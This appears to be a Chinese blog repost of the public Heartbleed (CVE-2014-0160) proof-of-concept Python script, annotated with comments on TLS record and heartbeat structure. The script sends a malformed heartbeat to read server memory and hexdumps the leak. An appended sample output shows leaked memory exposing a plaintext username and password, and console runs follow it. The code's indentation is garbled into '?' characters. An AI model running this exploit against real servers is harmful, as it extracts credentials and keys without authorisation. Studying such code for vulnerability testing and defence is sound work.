# coding=utf-8
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# ord()函數是chr()函數（對于8位的ASCII字符串）或unichr()函數（對于Unicode對象）的配對函數，它以一個字符（長度為1的字符串）作為參數，返回對應的ASCII數值
# X 表示以十六進制形式輸出,02表示不足兩位，前面補0輸出；如果超過兩位，則實際輸出
# 1、select函數阻塞進程，直到inputs中的套接字被觸發（在此例中，套接字接收到客戶端發來的握手信號，從而變得可讀，滿足select函數的“可讀”條件），rs返回被觸發的套接字（服務器套接字）； ?
# TLS記錄協議記錄頭中content type表示TSL記錄協議之上的上傳協議類型(改變密碼規范協議 告警協議 握手協議)
#心跳包類型，IANA組織把type編號定義為24（0x18）
#含有心跳擴展機制的TLS版本主要包含在TLSv1.0（0x0301），TLSv1.1（0x0302），TLSv1.2（0x0303）三種版本中
#imaps tcp-993? pop3s tcp-995? smtps tcp-465
#content type 20 改變密碼規范協議
#content type 21 告警協議
#content type 22 握手協議
#content type 23 應用數據協議
#content type 24 心跳類型

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
??? return x.replace(' ', '').replace('\n', '').decode('hex')

#client hello消息構造
hello = h2bin('''
16 03 02 00 dc? 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc? 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03? 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22? c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35? 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d? c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32? 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96? 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15? 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff? 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34? 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09? 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15? 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f? 00 10 00 11 00 23 00 00
00 0f 00 01 01?????????????????????????????? ?
''')
'''
16 03 02 00 dc是TSL記錄協議前面5個字節，00 dc表示（壓縮長度）220字節
'''
#心跳請求消息構造
hb = h2bin('''
18 03 02 00 03
01 40 00
''')


def hexdump(s):
??? for b in xrange(0, len(s), 16):?? #xrange與range相似，只不過xrange返回的是生成器
??????? lin = [c for c in s[b : b + 16]]
??????? hxdat = ' '.join('%02X' % ord(c) for c in lin)
??????? pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
??????? print '? %04x: %-48s %s' % (b, hxdat, pdat)
??? print

#按照長度接收返回數據，并返回
def recvall(s, length, timeout=5):
??? endtime = time.time() + timeout
??? rdata = ''
??? remain = length
??? while remain > 0:
??????? rtime = endtime - time.time()
??????? if rtime < 0:
??????????? return None
??????? r, w, e = select.select([s], [], [], 5)
??????? if s in r:
??????????? data = s.recv(remain)
??????????? # EOF?
??????????? if not data:
??????????????? return None
??????????? rdata += data
??????????? remain -= len(data)
??? return rdata
#
?
def recvmsg(s):
??? hdr = recvall(s, 5)#recvall返回接收的數據，接收的是type,version,length字節數(1,2,2)
??? if hdr is None:
??????? print 'Unexpected EOF receiving record header - server closed connection'
??????? return None, None, None
??? typ, ver, ln = struct.unpack('>BHH', hdr)
??? #struct.unpack將字節流轉變為Python類型數據，
?? ?

??? #ln中數據是TLS記錄開頭的5字節之后，開始算起，


??? pay = recvall(s, ln, 10)#recvall返回接收的數據
??? if pay is None:
??????? print 'Unexpected EOF receiving record payload - server closed connection'
??????? return None, None, None
??? print ' ... received message: type = %d, ver = %04x, length = %d pay= %s' % (typ, ver, len(pay),pay[0:6])
??? return typ, ver, pay

def hit_hb(s):
??? s.send(hb)
??? while True:
??????? typ, ver, pay = recvmsg(s)
??????? if typ is None:
??????????? print 'No heartbeat response received, server likely not vulnerable'
??????????? return False

??????? if typ == 24:
??????????? print 'Received heartbeat response:'
??????????? hexdump(pay)
??????????? if len(pay) > 3:
??????????????? print 'WARNING: server returned more data than it should - server is vulnerable!'
??????????? else:
??????????????? print 'Server processed malformed heartbeat, but did not return any extra data.'
??????????? return True

??????? if typ == 21:
??????????? print 'Received alert:'
??????????? hexdump(pay)
??????????? print 'Server returned error, likely not vulnerable'
??????????? return False

def main():
??? opts, args = options.parse_args()
??? if len(args) < 1:
??????? options.print_help()
??????? return

??? s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
??? print 'Connecting...'
??? sys.stdout.flush()
??? s.connect((args[0], opts.port))
??? print 'Sending Client Hello...'
??? sys.stdout.flush()
??? s.send(hello)
??? print 'Waiting for Server Hello...'
??? sys.stdout.flush()
??? while True: #相當于把TLS中回復的數據，同一個套接字緩存沖區，分四次，每次取出一部分對應
??????????????? #對應 certificate server key exchange server hello done服務器返回的消息
??????????????? #我認為套接字接收緩沖區的數據recv后，就被取走，不在存在對應套接字的緩沖區里了
?????????????? ?
??????? typ, ver, pay = recvmsg(s)
??????? if typ == None:
??????????? print 'Server closed connection without sending Server Hello.'
??????????? return
??????? #握手
??????? # Look for server hello done message; HelloDone表示雙方達成握手協議，握手接通,
??????? # Hellodown 4個字節0e 00 00 00
??????? if typ == 22 and ord(pay[0]) == 0x0E:
??????????? break

??? print 'Sending heartbeat request...'
??? sys.stdout.flush()
??? s.send(hb)
??? hit_hb(s)

if __name__ == '__main__':
??? main()

'''
18 03 02 40 00 02 40 00?? d8 03 02 53 43 5b 90 9d …@..@….SC[..
9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc .r….+..H…9..
16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 ……w.3….f..
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f …”.!.9.8……
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 …5…………
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e …………….
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 .3.2…..E.D….
00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 ./…A……….
00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 …………….
00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 …….I……..
00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c …4.2……….
00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 …………….
00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 …………….
00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 ………#……
01 6b 87 3c 2a f7 db 30 ef 5c d2 68 0f 8b c6 10 .k.<*..0..h….
37 2e 33 36 0d 0a 41 63 63 65 70 74 3a 20 74 65 7.36..Accept: te
78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 xt/html,applicat
69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 ion/xhtml+xml,ap
70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d plication/xml;q=
30 2e 39 2c 69 6d 61 67 65 2f 77 65 62 70 2c 2a 0.9,image/webp,*
2f 2a 3b 71 3d 30 2e 38 0d 0a 52 65 66 65 72 65 /*;q=0.8..Refere
72 3a 20 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 r: https://192.1
36 38 2e 31 39 37 2e 31 32 38 2f 63 68 65 63 6b 68.197.128/check
2e 70 68 70 3f 6e 61 6d 65 3d 79 61 6f 66 65 69 .php?name=yaofei
26 70 61 73 73 77 6f 72 64 3d 31 32 33 34 35 36 &password=123456
0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin
67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
2c 20 73 64 63 68 2c 20 62 72 0d 0a 41 63 63 65 , sdch, br..Acce
70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 7a 68 2d pt-Language: zh-
43 4e 2c 7a 68 3b 71 3d 30 2e 38 0d 0a 0d 0a 9d CN,zh;q=0.8…..
47 d4 f2 b4 2e dc 63 f7 4c 28 bb 43 71 41 ca 00 G…..c.L(.CqA..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
'''
'''
D:\Desktop>python find_opensslbug.py server -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
?... received message: type = 22, ver = 0302, length = 66
?... received message: type = 22, ver = 0302, length = 2804
?... received message: type = 22, ver = 0302, length = 331
?... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable

D:\Desktop>python find_opensslbug.py server -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
?... received message: type = 22, ver = 0302, length = 53
?... received message: type = 22, ver = 0302, length = 4760
?... received message: type = 22, ver = 0302, length = 331
?... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
?... received message: type = 21, ver = 0302, length = 2
Received alert:
? 0000: 02 0A??????????????????????????????????????????? ..

Server returned error, likely not vulnerable

D:\Desktop>python find_opensslbug.py server -p 443
'''

總結

以上是生活随笔為你收集整理的OpenSSL心脏滴血检测的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。